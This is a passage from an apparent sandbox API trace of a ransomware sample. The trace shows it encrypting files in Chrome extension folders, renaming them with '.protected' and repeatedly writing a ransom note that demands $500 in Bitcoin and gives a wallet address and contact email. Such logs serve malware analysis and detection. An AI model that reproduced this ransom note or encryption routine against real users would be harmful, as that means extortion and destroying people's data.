lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.protected")) returned 1 [0080.540] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.540] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.541] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\RESTORE_FILES.txt") returned 159 [0080.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.541] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.541] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.542] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.542] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.542] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.542] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.542] CloseHandle (hObject=0x164) returned 1 [0080.542] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.542] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0080.542] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0080.542] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0080.542] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0080.542] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0080.542] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it") returned 141 [0080.542] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0080.542] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0080.542] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\*") returned 143 [0080.542] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.542] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.542] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.542] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.542] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.542] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.542] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\.") returned 143 [0080.542] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.542] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.543] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.543] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.543] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.543] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.543] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\..") returned 144 [0080.543] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.543] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.543] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0080.543] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.543] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.543] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.543] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0080.544] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0080.544] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json") returned 155 [0080.544] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.544] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb6, lpOverlapped=0x0) returned 1 [0080.545] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.545] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb6, lpOverlapped=0x0) returned 1 [0080.545] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.545] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.545] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.545] CloseHandle (hObject=0x168) returned 1 [0080.546] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.protected") returned 165 [0080.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.protected")) returned 1 [0080.546] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.546] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.547] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0080.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.547] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.547] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.548] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.548] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.548] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.548] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.548] CloseHandle (hObject=0x164) returned 1 [0080.548] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="Windows") returned -1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="Program Files") returned -1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="Program Files (x86)") returned -1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="$Recycle.bin") returned 1 [0080.548] lstrcmpiW (lpString1="iw", lpString2="System Volume Information") returned -1 [0080.548] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw") returned 141 [0080.548] lstrcmpW (lpString1="iw", lpString2=".") returned 1 [0080.548] lstrcmpW (lpString1="iw", lpString2="..") returned 1 [0080.548] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\*") returned 143 [0080.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.548] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.549] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.549] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.549] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.549] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.549] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\.") returned 143 [0080.549] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.549] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.549] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.549] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.549] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.549] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.549] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.549] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\..") returned 144 [0080.549] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.549] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.549] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.549] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.549] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0080.549] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.549] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.549] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.549] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.550] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0080.550] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.550] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0080.550] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.550] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json") returned 155 [0080.550] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.550] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x16a, lpOverlapped=0x0) returned 1 [0080.550] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.551] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x16a, lpOverlapped=0x0) returned 1 [0080.551] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.551] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.551] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.551] CloseHandle (hObject=0x168) returned 1 [0080.551] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.protected") returned 165 [0080.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 